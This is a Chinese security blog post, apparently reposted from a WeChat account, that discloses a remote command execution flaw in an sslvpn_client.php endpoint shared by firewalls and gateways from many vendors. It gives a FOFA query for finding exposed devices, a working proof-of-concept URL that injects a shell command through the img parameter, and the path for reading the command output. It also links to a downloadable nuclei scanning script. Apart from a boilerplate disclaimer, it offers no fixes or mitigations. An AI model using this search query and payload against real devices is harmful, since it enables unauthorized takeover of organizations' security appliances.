多个安全设备 sslvpn_client.php RCE

admin 2023年12月18日13:57:32评论107 views字数 771阅读2分34秒阅读模式
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!

00

漏洞概述

多个安全设备 sslvpn_client.php 接口存在RCE漏洞

01

空间搜索语法

fofa

 

body="/webui/images/default/default/alert_close.jpg"

02

利用过程

漏洞影响设备

H3C-下一代防火墙安全信息-明御安全网关MAIPU-安全网关D-Link-下一代防火墙HUAWEI-产品迈普通信技术股份有限公司安全网关博达通信-下一代防火墙任天行网络安全管理系统/安全审计系统安博通应用网关烽火网络安全审计瑞斯康达科技发展股份有限公司安全路由器任子行网络安全审计系统绿盟安全审计系统深圳市鑫塔科技有限公司第二代防火墙海康威视安全网关优炫防火墙SG-8000深度安全网关网御星云上网行为管理系统360上网行为审计系统

 

POC如下

http://xxxx/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/1.txt|ls

漏洞存在响应如下

多个安全设备 sslvpn_client.php RCE

访问地址如下获取结果

http://xxx/sslvpn/1.txt

多个安全设备 sslvpn_client.php RCE

03

nuclei

多个安全设备 sslvpn_client.php RCE

获取脚本:

sslvpn1下载地址:
链接:https://pan.baidu.com/s/1v5j-KINQql1bmDBJsF69qA
提取码:k7bu

 

 

原文始发于微信公众号(天澜实验室):多个安全设备 sslvpn_client.php RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月18日13:57:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   多个安全设备 sslvpn_client.php RCEhttps://cn-sec.com/archives/2291118.html

发表评论

匿名网友 填写信息